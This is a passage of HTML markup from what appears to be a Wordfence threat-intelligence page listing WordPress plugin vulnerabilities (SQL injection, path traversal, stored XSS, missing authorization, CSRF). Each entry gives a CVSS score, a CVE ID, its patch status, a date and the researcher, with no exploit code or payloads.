						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">WP Directory Kit</a> <span class="wfvr-software-slug">[wpdirectorykit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21aa8edc-0ba4-4bb1-857e-007b2364f665" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af18f38a-f3cb-46ae-9409-80e35c34df83" target="_blank" rel="noopener">Mail Mint &lt;= 1.31.0 &#8211; Authenticated (Custom+) SQL Injection via &#8216;status&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19800" target="_blank" rel="noopener noreferrer">							CVE-2026-19800						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mail-mint" target="_blank" rel="noopener">Mail Mint – Email Marketing, Automation &amp; WooCommerce Emails with AI Assistance</a> <span class="wfvr-software-slug">[mail-mint]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af18f38a-f3cb-46ae-9409-80e35c34df83" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fa57e8eb-4284-488a-a86e-0f59d432fdca" target="_blank" rel="noopener">Quentn WP &lt;= 1.2.14 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84113" target="_blank" rel="noopener noreferrer">							CVE-2026-84113						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quentn-wp" target="_blank" rel="noopener">Quentn WP</a> <span class="wfvr-software-slug">[quentn-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fa57e8eb-4284-488a-a86e-0f59d432fdca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6937ff48-f4f1-4f63-a76c-8e13cdba5800" target="_blank" rel="noopener">Sky Addons for Elementor &lt;= 3.8.4 &#8211; Authenticated (Editor+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62109" target="_blank" rel="noopener noreferrer">							CVE-2026-62109						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sky-elementor-addons" target="_blank" rel="noopener">Sky Addons for Elementor</a> <span class="wfvr-software-slug">[sky-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6937ff48-f4f1-4f63-a76c-8e13cdba5800" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50272c8a-2e23-490d-8865-68ae49228895" target="_blank" rel="noopener">WP BackItUp Community Edition &lt;= 2.1.0 &#8211; Authenticated (Administrator+) Path Traversal to Arbitrary File Read via &#8216;backup_file&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18386" target="_blank" rel="noopener noreferrer">							CVE-2026-18386						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-backitup" target="_blank" rel="noopener">WP BackItUp Community Edition</a> <span class="wfvr-software-slug">[wp-backitup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nikola-kojic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4aba337ae4f69efc227bbee54dacad49.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4aba337ae4f69efc227bbee54dacad49"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nikola-kojic" target="_blank" rel="noopener">Nikola Kojic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50272c8a-2e23-490d-8865-68ae49228895" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6958b5c-2f67-4f9b-acb2-85dc82c039b5" target="_blank" rel="noopener">WP Crowdfunding &lt;= 2.2.1 &#8211; Authenticated (Shop Manager+) SQL Injection via &#8216;wpneo_reward&#8217; Post Meta</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19944" target="_blank" rel="noopener noreferrer">							CVE-2026-19944						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-crowdfunding" target="_blank" rel="noopener">WP Crowdfunding</a> <span class="wfvr-software-slug">[wp-crowdfunding]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6958b5c-2f67-4f9b-acb2-85dc82c039b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e675957b-b8be-40bc-ae91-9cf0fa3cf374" target="_blank" rel="noopener">Temporary Login Without Password 1.5 &#8211; 1.9.8 &#8211; Authenticated (Administrator+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">4.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.7 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77752" target="_blank" rel="noopener noreferrer">							CVE-2026-77752						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/temporary-login-without-password" target="_blank" rel="noopener">Temporary Login Without Password</a> <span class="wfvr-software-slug">[temporary-login-without-password]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/baptoutatis" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4b15dda37cd16c042771958e3983fb62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4b15dda37cd16c042771958e3983fb62"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/baptoutatis" target="_blank" rel="noopener">BaptouTatis</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e675957b-b8be-40bc-ae91-9cf0fa3cf374" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c1418be-6d87-4056-a75f-431a26bd9d88" target="_blank" rel="noopener">Translate WordPress with GTranslate &lt; 3.0.10 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-15695" target="_blank" rel="noopener noreferrer">							CVE-2025-15695						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gtranslate" target="_blank" rel="noopener">Translate WordPress with GTranslate</a> <span class="wfvr-software-slug">[gtranslate]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c1418be-6d87-4056-a75f-431a26bd9d88" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51abaca6-d882-40b8-86b1-e21835566e3b" target="_blank" rel="noopener">Advanced Contact form 7 DB &lt;= 2.1.3 &#8211; Missing Authorization to Authenticated (Custom+) Unauthorized Data Import via &#8216;import_cf7_id&#8217;</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18594" target="_blank" rel="noopener noreferrer">							CVE-2026-18594						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-cf7-db" target="_blank" rel="noopener">Advanced Contact form 7 DB</a> <span class="wfvr-software-slug">[advanced-cf7-db]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jiang-cy" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c17f4b959c97acbb86873b2ce6313fef.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c17f4b959c97acbb86873b2ce6313fef"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jiang-cy" target="_blank" rel="noopener">Jiang CY</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51abaca6-d882-40b8-86b1-e21835566e3b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16e8fcd3-9fc6-440f-b7d8-28f49eca6303" target="_blank" rel="noopener">Advanced Customized Prompts &lt;= 1.0.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14566" target="_blank" rel="noopener noreferrer">							CVE-2026-14566						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-customized-prompts" target="_blank" rel="noopener">Advanced Customized Prompts</a> <span class="wfvr-software-slug">[advanced-customized-prompts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aaf374001487ef75a3024e689e8db54a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aaf374001487ef75a3024e689e8db54a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener">0xBassia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16e8fcd3-9fc6-440f-b7d8-28f49eca6303" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/208f9475-446c-4cf1-9d70-a845cf9b3005" target="_blank" rel="noopener">Awesome Support &lt;= 6.3.9 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary User Denial via &#8216;user_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19946" target="_blank" rel="noopener noreferrer">							CVE-2026-19946						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/awesome-support" target="_blank" rel="noopener">Awesome Support – WordPress HelpDesk &amp; Support Plugin</a> <span class="wfvr-software-slug">[awesome-support]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/208f9475-446c-4cf1-9d70-a845cf9b3005" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1f90282-ca24-4f4b-91ea-9f26fda2bcc5" target="_blank" rel="noopener">BackWPup – WordPress Backup &amp; Restore Plugin 5.2.2 &#8211; 5.7.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86815" target="_blank" rel="noopener noreferrer">							CVE-2026-86815						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup" target="_blank" rel="noopener">BackWPup – WordPress Backup &amp; Restore Plugin</a> <span class="wfvr-software-slug">[backwpup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1f90282-ca24-4f4b-91ea-9f26fda2bcc5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/deb13e12-bec3-4266-8fa1-8fcebb16e29a" target="_blank" rel="noopener">BEAR – Bulk Editor for WooCommerce Professional. AI assistant on board (MCP Server) &lt; 1.2.2 &#8211; Authenticated (Custom Role+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84025" target="_blank" rel="noopener noreferrer">							CVE-2026-84025						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-bulk-editor" target="_blank" rel="noopener">BEAR – Bulk Editor for WooCommerce Professional. AI assistant on board (MCP Server)</a> <span class="wfvr-software-slug">[woo-bulk-editor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ali-mousavi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/14d108451720dcd5393c98321cf438a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="14d108451720dcd5393c98321cf438a8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ali-mousavi" target="_blank" rel="noopener">Ali Mousavi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/deb13e12-bec3-4266-8fa1-8fcebb16e29a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b86e1f97-e5be-4f4a-9caa-6180fe677bcd" target="_blank" rel="noopener">BEAR – Bulk Editor for WooCommerce Professional. AI assistant on board (MCP Server) &lt; 1.2.2 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84023" target="_blank" rel="noopener noreferrer">							CVE-2026-84023						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-bulk-editor" target="_blank" rel="noopener">BEAR – Bulk Editor for WooCommerce Professional. AI assistant on board (MCP Server)</a> <span class="wfvr-software-slug">[woo-bulk-editor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ali-mousavi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/14d108451720dcd5393c98321cf438a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="14d108451720dcd5393c98321cf438a8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ali-mousavi" target="_blank" rel="noopener">Ali Mousavi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b86e1f97-e5be-4f4a-9caa-6180fe677bcd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2d833841-2482-4bc5-9b6b-aaab0bbf87ae" target="_blank" rel="noopener">BEAR – Bulk Editor for WooCommerce Professional. AI assistant on board (MCP Server) &lt; 1.2.2 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
